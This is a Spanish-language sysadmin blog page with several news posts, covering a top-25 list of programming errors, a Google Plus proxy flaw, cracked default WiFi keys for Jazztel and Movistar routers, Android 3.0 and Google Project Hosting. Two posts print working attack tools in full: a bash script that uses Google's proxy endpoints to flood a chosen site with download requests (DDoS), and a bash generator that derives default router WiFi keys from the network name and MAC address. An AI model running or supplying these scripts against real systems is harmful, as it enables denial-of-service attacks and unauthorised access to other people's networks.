noticia | Blogofsysadmins.com

23/06/2024

Lista de los 25 errores de programación más peligrosos

Grupo internacional de expertos ha publicado una lista con los 25 errores de programación con mayor potencial de daño. La mayor parte de los agujeros de seguridad en programas informáticos se debe a errores de programación, que podrían ser evitados si los programadores fueran más cautelosos con su trabajo.

Ante tal situación, un grupo internacional de expertos ha elaborado una lista con los 25 peores errores de programación que ocasionan vulnerabilidades. El grupo incluye, entre otros, al ministerio de seguridad interior de EEUU y NSA, la organización japonesa IPA y empresas privadas como Microsoft y Symantec.

La mayoría de los 25 errores de la lista son relativamente desconocidos entre los propios programadores. No forman parte de los estudios de los desarrolladores, y un mínimo de los fabricantes de software no prueban sus productos en busca de errores antes de lanzarlos comercialmente.

Las consecuencias pueden ser nefastas. Por ejemplo, dos de tales errores fueron explotados en 2008 para instalar código maligno en 1,5 millones de sitios web, que luego propagaron malware entre sus visitantes.
Continuar leyendo «Lista de los 25 errores de programación más peligrosos»

28/12/2023

Fallo de seguridad en los servidores de Google Plus

Un nuevo agujero de seguridad ha sido descubierto en los servidores de Google plus que permite a los hackers hacer un ataque DDoS usando el ancho de banda de Google.

Google plus ha sido objeto de pruebas desde ya hace un tiempo y una de las personas encargadas de estas pruebas (de una empresa de seguridad italiana) ha informado de que los servidores de Google plus se pueden utilizar para hacer solicitudes DDos a otros sitios web.

La noticia original de este informe se puede ver en IHTeam un blog de seguridad propiedad de Simone Quatrini. Él demuestra cómo los usuarios pueden hacer uso del servidor de Google para actuar como un proxy y buscar el contenido de cualquier sitio web que desee. También se observa que los servidores de Google son más anónimos que los demás servidores.

Ha mencionado dos métodos, uno que utiliza / _ / sharebox / linkpreview /. Este método no expone su dirección IP para conectarse a los servidores Apache. Pero el otro método, gadgets / proxy? Parece que si que se expone la dirección IP a los servidores.

El equipo también ha publicado un script para shell de linux que permite ejecutar la vulnerabilidad. El script hace una solicitud a los servidores de Google para hacer una petición a una página web. Lo importante del tema es que se utiliza el ancho de banda de Google en lugar del atancante.

Según comenta el autor, hayo otros métodos para atacar de manera más segura, pero lógicamente no los quiere exponer en la red.

Resumiendo, se puede hacer y descargar senzilla y rápidamente cualquier tipo de archivo a través de los servidores de Google haciendo un DDoS.

Mas abajo teneis el video explicativo y el script en bash que usa en el video Simone Quatrini 😀

Fuente | IHTeam

In this example i start a thread of 1000 requests and the output bandwidth will result in 91/96Mbps (my house bandwidth is only 6Mbps). This is my server, do not start to ddos around for no reason!

+DDoS source code download:

http://www.ihteam.net/advisories/_154785695367_+ddos.sh

#!/bin/bash

#   Bug found by                        #
#       Simone 'R00T_ATI' Quatrini      #
#       Mauro 'epicfail' Gasperini      #
#       Site: http://www.ihteam.net     #

function start {
    echo "[*] Sending `echo $2` Requests..."

    for a in `seq $2`
    do
        id=$((RANDOM%3999999+3000000))
        nohup curl "https://plus.google.com/_/sharebox/linkpreview/?c=$url&t=1&_reqid=$id&rt=j" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
        nohup curl "https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=$urlclear&container=focus" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
    done

    echo "[*] Still attacking `echo $urlclear`"
    echo "[*] Sleeping for 10 Seconds"
    sleep 10
    start url $2 urlclear
}

echo ''
echo '             88888888ba,    88888888ba,                  ad88888ba  '
echo '    aa      88      `"8b   88      `"8b                d8"     "8b  '
echo '    88      88        `8b  88        `8b               Y8,          '
echo 'aaaa88aaaa  88         88  88         88   ,adPPYba,   `Y8aaaaa,    '
echo '""""88""""  88         88  88         88  a8"     "8a    `"""""8b,  '
echo '    88      88         8P  88         8P  8b       d8          `8b  '
echo '    ""      88      .a8P   88      .a8P   "8a,   ,a8"  Y8a     a8P  '
echo '            88888888Y""    88888888Y""     `"YbbdP""    "Y88888P"'
echo ''

if [ "$#" -lt 2 ]; then
    echo "Usage: $0 <big file> <Requests>"
    echo "Example: $0 http://www.site.com/very_big_file.tar.gz 1000"
    echo ""

    exit 0
fi

case $2 in
    *[!0-9]* )  echo "$2 is not numeric" && exit 1;;
esac

echo "Attack -->" $1
match1=/
repl1=%2F
match2=:
repl2=%3A
url=$1
urlclear=$1

url=${url//$match1/$repl1}
url=${url//$match2/$repl2}

echo ""
echo "[*] Loop started! CTRL+C to stop"
echo ""

start url $2 urlclear

14/12/2023

Algoritmo descifrado de los routers wifi de Jazztel y Teléfonica

Los usuarios de jazztel y Telefonica movistar que no hayan cambiado el nombre (ESSID) de sus wifis pueden ir pensando en hacerlo: El algoritmo ha sido descifrado. Por lo visto, el que sacó a la luz el algoritmo fue elvecinoo en este hilo de lampiweb En http://kz.ath.cx/wlan/ (Entre otros) se ingresa nombre y la MAC del router y te la clava.

A mi me gusta más la versión en Bash:

#!/bin/bash

echo CalcWLAN by a.s.r

if [ $# -ne 2 ]
then
echo "Usage: $0  "
echo
echo "Example: $0 WLAN_C58D 64:68:0C:C5:C5:90"
exit 1
fi

HEAD=$(echo -n "$1" | tr 'a-z' 'A-Z' | cut -d_ -f2)
BSSID=$(echo -n "$2" | tr 'a-z' 'A-Z' | tr -d :)
BSSIDP=$(echo -n "$BSSID" | cut -c-8)
KEY=$(echo -n bcgbghgg$BSSIDP$HEAD$BSSID | md5sum | cut -c-20)

echo "La puta clave es $KEY"

Teneis un mirror para generar la clave online aqui mismo:
https://blogofsysadmins.com/generador-de-claves-wifi-para-jazztel_xxxx-y-wlan_xxxx

Mas información:

http://www.hispasec.com/unaaldia/4487

http://elvecinoo.wordpress.com/

08/12/2023

Google presenta su versión de Android 3.0 para las tablets

Google presenta Android 3.0 para las tablets

El gigante de internet Google presentó hoy la nueva versión de su sistema operativo Android, el Android 3.0 o Honeycomb, un software creado para disputar el dominio del popular iPad de Apple en el mercado de tabletas informáticas.
Más allá de ser una actualización de su predecesor, el Android 2.3 apodado Gingerbread, que vio la luz en diciembre, Honeycomb nació rediseñado desde sus cimientos para sacar el máximo partido a dispositivos móviles con grandes pantallas.
Android 3.0, un software libre de Google, adaptó la navegación por sus pantallas a las posibilidades que ofrecen las tabletas, permite la realización de varias tareas simultáneamente e integra un sistema para regresar rápidamente a las últimas tareas ejecutadas.

Google presenta su versión de Android 3.0 para las tablets

Android 3.0 es un sistema operativo apto para gráficos en 3D, con teclado virtual, reproducción de vídeo a tiempo real desde internet, videollamada, así como las conexiones de las tabletas con otros dispositivos equipados con Bluetooth.
Los ingenieros detrás de Android dedicaron el evento celebrado hoy en la sede de Google, en Mountain View, en los alrededores de San Francisco, a dar a conocer las posibilidades que ofrece el nuevo sistema operativo para los desarrolladores de aplicaciones, más que para el propio consumidor.
«Honeycomb consiste en llevar la rapidez asociada a internet a las tabletas», comentó Hugo Barra, director de productos para móviles de Google.
Para la demostración del remodelado Android se empleó un prototipo de la tableta de Motorola Xoom, la primera que llegará al mercado equipada con Honeycomb y con fecha de lanzamiento previsto para el 17 de febrero en EE.UU..
Google aseguró que Honeycomb es compatible con todas las aplicaciones existentes ya en el mercado de Android, aunque fueran desarrolladas para versiones anteriores del sistema, y aprovechó el evento para lanzar el Android Market Webstore, un mercado de aplicaciones en la nube al estilo de lo que tiene Apple.

06/12/2023

Google Project Hosting incorporará una nueva función para mejorar el desarrollo comunitario de software

¿Alguna vez te encontraste con un error en el código de un programa y no pudiste solucionarlo? Tal vez estabas leyendo el código desde tu explorador de internet, o tal vez no tenías a mano en ese momento Subversion o Mercurial para realizar los cambios. Bueno, el equipo del Google Project Hosting ha anunciado una nueva funcionalidad disponible para todos los desarrolladores intrépidos: la posibilidad de editar el código fuente de los programas alojados allí (en code.google.com) directamente desde el explorador de internet, utilizando el poderoso editor basado en CodeMirror. Sólo hace falta hacer clic en el botón «Edit file» para acceder a esta funcionalidad.

A medida que comenzás a editar el archivo, es posible ver los cambios respecto del original (diff) y, de ese modo, nunca vas a perder la dimensión de los cambios que estás introduciendo. Pero, ¿qué pasa si no tengo los privilegios suficientes (commit privileges) como para aplicar cambios directamente? Ningún problema. En vez de aplicar los cambios en forma directa, podés guardar los cambios como un parche de modo que los desarrolladores del programa lo evaluarán y decidirán su futura incorporación.

Al bajar los requisitos para que cualquier mortal ayude a mejorar los programas de software libre, Google está dando una GRAN mano para que éstos puedan pulirse, incorporar nuevas funcionalidades, ser más estables, etc. En una palabra, esta es una gran noticia para el desarrollo de software libre.

Fuente: Blog oficial de Google Open Source